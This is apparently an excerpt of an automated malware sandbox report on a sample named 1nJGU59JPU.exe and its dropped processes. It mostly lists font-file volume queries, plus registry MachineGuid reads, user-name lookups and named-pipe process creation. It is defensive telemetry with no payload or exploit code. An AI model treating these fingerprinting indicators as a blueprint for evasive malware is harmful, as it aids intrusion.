Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe Queries volume information: C:\Program Files (x86)\i-record\AForge.Video.FFMPEG.dll VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Program Files (x86)\i-record\I-Record.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_004026C4 GetSystemTime, 0_2_004026C4
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00455644 GetUserNameA, 1_2_00455644
Source: C:\Users\user\AppData\Local\Temp\is-5FEVP.tmp\1nJGU59JPU.tmp Code function: 1_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle, 1_2_00458670
Source: C:\Users\user\Desktop\1nJGU59JPU.exe Code function: 0_2_00405CF4 GetVersionExA, 0_2_00405CF4
[IP distribution chart legend: No. of IPs < 25%; 25% to 50%; 50% to 75%; above 75%]